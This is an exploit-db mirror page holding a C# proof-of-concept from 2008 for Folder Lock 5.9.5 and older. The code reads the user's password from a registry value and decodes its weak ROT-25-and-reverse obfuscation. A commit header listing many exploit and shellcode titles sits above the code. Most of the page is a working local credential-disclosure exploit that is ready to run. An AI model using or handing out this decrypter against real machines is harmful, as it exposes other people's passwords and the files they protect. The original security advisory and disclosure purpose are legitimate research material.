bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/32281.cs
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

145 lines
No EOL
4.6 KiB
C#
Raw Blame History

source: https://www.securityfocus.com/bid/30766/info
Folder Lock is prone to an information-disclosure vulnerability because it stores credentials in an insecure manner.
A local attacker can exploit this issue to obtain passwords used by the application, which may aid in further attacks.
Folder Lock 5.9.5 is vulnerable; other versions may also be affected.
/*
* Folder Lock <= 5.9.5 Local Password Information Disclosure
*
* Author(s): Charalambous Glafkos
* George Nicolaou
* Date: June 19, 2008
* Site: http://www.astalavista.com
* Mail: glafkos@astalavista.com
* ishtus@astalavista.com
*
* Synopsis: Folder Lock 5.9.5 and older versions are prone to local information-disclosure vulnerability.
* Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks.
* The security issue is caused due to the application storing access credentials within the Windows registry key:
* (HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl) without proper encryption.
* This can be exploited to disclose the encrypted _pack password of the user which is ROT-25 and reversed.
*
* Sample Output:
*
* ASTALAVISTA the hacking & security community
* Folder Lock <= 5.9.5 Decrypter v2.0
* ---------------------------------
* Encrypted Password: :3<k_^62`4T-
* Decrypted Password: ,S3_15]^j;29
*
*/
using System;
using System.Text;
using System.IO;
using System.Threading;
using Microsoft.Win32;
namespace getRegistryValue
{
class getValue
{
static void Main()
{
getValue details = new getValue();
Console.WriteLine("\nASTALAVISTA the hacking & security community\n\n");
Console.WriteLine("Folder Lock <= 5.9.5 Decrypter v2.0");
Console.WriteLine("---------------------------------");
String strFL = details.getFL();
Console.WriteLine(strFL);
Thread.Sleep(5000);
}
private string getFL()
{
RegistryKey FLKey = Registry.CurrentUser;
FLKey = FLKey.OpenSubKey(@"Software\Microsoft\Windows\QualityControl", false);
String _pack = FLKey.GetValue("_pack").ToString();
String strFL = "Encrypted Password: " + _pack.Replace("~", "") + "\nDecrypted Password: " + Reverse(Rotate(_pack.Replace("~", ""))) + "\n";
return strFL;
}
public string Reverse(string x)
{
char[] charArray = new char[x.Length];
int len = x.Length - 1;
for (int i = 0; i <= len; i++)
charArray[i] = x[len - i];
return new string(charArray);
}
public static string Rotate(string toRotate)
{
char[] charArray = toRotate.ToCharArray();
for (int i = 0; i < charArray.Length; i++)
{
int thisInt = (int)charArray[i];
if (thisInt >= 65 && thisInt <= 91)
{
thisInt += 25;
if (thisInt >= 91)
{
thisInt -= 26;
}
}
if (thisInt >= 92 && thisInt <= 96)
{
thisInt += 25;
if (thisInt >= 96)
{
thisInt -= 26;
}
}
if (thisInt >= 32 && thisInt <= 47)
{
thisInt += 25;
if (thisInt >= 47)
{
thisInt -= 26;
}
}
if (thisInt >= 48 && thisInt <= 57)
{
thisInt += 25;
if (thisInt >= 57)
{
thisInt -= 26;
}
}
if (thisInt >= 58 && thisInt <= 64)
{
thisInt += 25;
if (thisInt >= 64)
{
thisInt -= 26;
}
}
if (thisInt >= 97 && thisInt <= 123)
{
thisInt += 25;
if (thisInt >= 123)
{
thisInt -= 26;
}
}
charArray[i] = (char)thisInt;
}
return new string(charArray);
}
}
}
Reference in a new issue View git blame Copy permalink